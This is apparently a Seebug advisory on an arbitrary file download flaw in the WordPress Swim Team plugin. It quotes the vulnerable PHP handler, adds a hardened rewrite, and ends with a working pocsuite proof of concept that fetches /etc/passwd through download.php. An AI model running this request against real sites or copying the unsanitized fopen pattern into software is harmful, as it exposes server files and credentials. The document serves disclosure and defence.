WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download

2015-09-01T00:00:00
ID SSV:89281
Type seebug
Reporter dropzero
Modified 2015-09-01T00:00:00

Description

The code in ./wp-swimteam/include/user/download.php does not sanitize user input before opening a file, so a request can make the handler read and return arbitrary files that the web server process can read (lines 50-70 of the file):

                $file = urldecode($args['file']) ;
                $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;

                while (!feof($fh))
                    $txt .= fread($fh, 1024) ;

                //  Clean up the temporary file - permissions
                //  may prevent this from succeeding so use the '@'
                //  to suppress any messages from PHP.

                @unlink($file) ;
            }

            $filename = urldecode($args['filename']) ;
            $contenttype = urldecode($args['contenttype']) ;

            // Tell browser to expect a text file of some sort (usually txt or csv)

            header(sprintf('Content-Type: application/%s', $contenttype)) ;
            header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;
            print $txt ;

Note that the same unsanitized path is also passed to @unlink() after the read, and that the Content-Type subtype and the attachment filename are likewise taken from the request without validation.
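For comparison, the following is an added example of how the same handler can be written so that the request can only name a file inside one directory the plugin owns. It is not the plugin's code; the directory $export_dir, the function names, and the allow-list of export types (csv and txt, following the comment in the original) are assumptions for illustration.

```php
<?php
// Added example (not wp-swimteam code): a hardened replacement for the
// download handler excerpted above. Assumes exported files live only in
// $export_dir and the request carries the same 'file', 'filename' and
// 'contenttype' parameters as the original.

function safe_download_path(string $export_dir, string $requested): ?string
{
    // Resolve the allowed base directory once; fail closed if it does not exist.
    $base = realpath($export_dir);
    if ($base === false) {
        return null;
    }
    // Only the file name is taken from the request; any directory part is dropped.
    $name = basename(urldecode($requested));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // realpath() collapses '..' and resolves symlinks; the result must stay inside $base.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    if (!is_file($candidate)) {
        return null;
    }
    return $candidate;
}

function safe_content_type(string $requested): string
{
    // Allow-list the types the export feature produces (assumed: csv and txt)
    // instead of interpolating the request into the header.
    $allowed = ['csv' => 'text/csv', 'txt' => 'text/plain'];
    $key = strtolower(urldecode($requested));
    return $allowed[$key] ?? 'application/octet-stream';
}

function safe_attachment_name(string $requested): string
{
    // Drop any path component and anything outside a conservative character set.
    $name = basename(urldecode($requested));
    $name = preg_replace('/[^A-Za-z0-9._-]/', '_', $name);
    return $name === '' ? 'download' : $name;
}

function send_export(array $args, string $export_dir): void
{
    $path = safe_download_path($export_dir, $args['file'] ?? '');
    if ($path === null) {
        http_response_code(400);
        exit('Invalid file request.');
    }
    $txt = file_get_contents($path);
    @unlink($path);  // same clean-up as the original, now confined to $export_dir
    header('Content-Type: ' . safe_content_type($args['contenttype'] ?? ''));
    header('Content-Disposition: attachment; filename="' . safe_attachment_name($args['filename'] ?? '') . '"');
    header('X-Content-Type-Options: nosniff');
    print $txt;
}

// Example wiring (constructed): $export_dir would be a plugin-private directory
// under the uploads folder, and $args the request parameters.
// send_export($_GET, WP_CONTENT_DIR . '/uploads/wp-swimteam-exports');
```

The key change is that the request no longer supplies a path at all, only a file name that is joined to a fixed directory and then checked with realpath() so that traversal sequences and symlinks cannot escape it; the clean-up unlink() is therefore also confined to that directory.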

#!/usr/bin/env python
# -*- coding:utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = '89281'
    author = 'anonymous'
    vulDate = '2015-07-13'
    createDate = '2015-10-06'
    updateDate = '2015-10-06'
    references = ['http://www.sebug.net/vuldb/ssvid-89281']
    name = 'WordPress Swim Team Plugin Arbitrary File Download'
    appPowerLink = 'https://wordpress.org/plugins/wp-swimteam'
    appName = 'WordPress Swim Team Plugin'
    appVersion = '1.44.10777'
    vulType = 'Arbitrary File Download'
    desc = '''WordPress Swim Team Plugin Arbitrary File Download in download.php file.'''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress' % self.url
        response = req.get(vul_url, timeout=10).content

        if 'bin/bash' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output


register(TestPOC)